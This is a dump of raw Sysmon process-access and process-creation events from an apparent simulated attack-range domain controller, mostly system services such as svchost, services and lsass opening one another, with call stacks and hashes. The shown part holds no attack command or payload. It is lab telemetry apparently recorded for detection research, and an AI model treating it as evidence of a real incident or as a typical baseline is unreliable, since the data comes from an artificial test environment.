12:02:14.253{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004682Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.253{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004681Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.253{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004680Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.253{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004679Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.253{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64C6-6064-A800-00000000AE01}2512C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004678Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.253{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64C6-6064-A800-00000000AE01}2512C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000004677Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.114{266CAFBE-64C6-6064-A800-00000000AE01}2512C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004676Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.128{266CAFBE-646A-6064-0A00-00000000AE01}8403012C:\Windows\system32\services.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004675Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.128{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004674Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.113{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004673Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.113{266CAFBE-646A-6064-0A00-00000000AE01}8403048C:\Windows\system32\services.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004672Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.113{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004671Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.113{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004670Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.113{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004669Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.113{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004668Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.097{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004667Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.097{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004666Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.097{266CAFBE-64C5-6064-A700-00000000AE01}43883160C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+bf29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000004665Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.097{266CAFBE-64C5-6064-A700-00000000AE01}43883160C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+beb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000004664Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.097{266CAFBE-64C5-6064-A700-00000000AE01}43883160C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+b71e|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000004663Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.097{266CAFBE-64C5-6064-A700-00000000AE01}43883160C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+b680|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000004662Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.097{266CAFBE-64C5-6064-A700-00000000AE01}43883032C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+bf29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000004661Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.097{266CAFBE-64C5-6064-A700-00000000AE01}43883032C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+beb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000004660Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.097{266CAFBE-64C5-6064-A700-00000000AE01}43883032C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+bf29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000004659Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 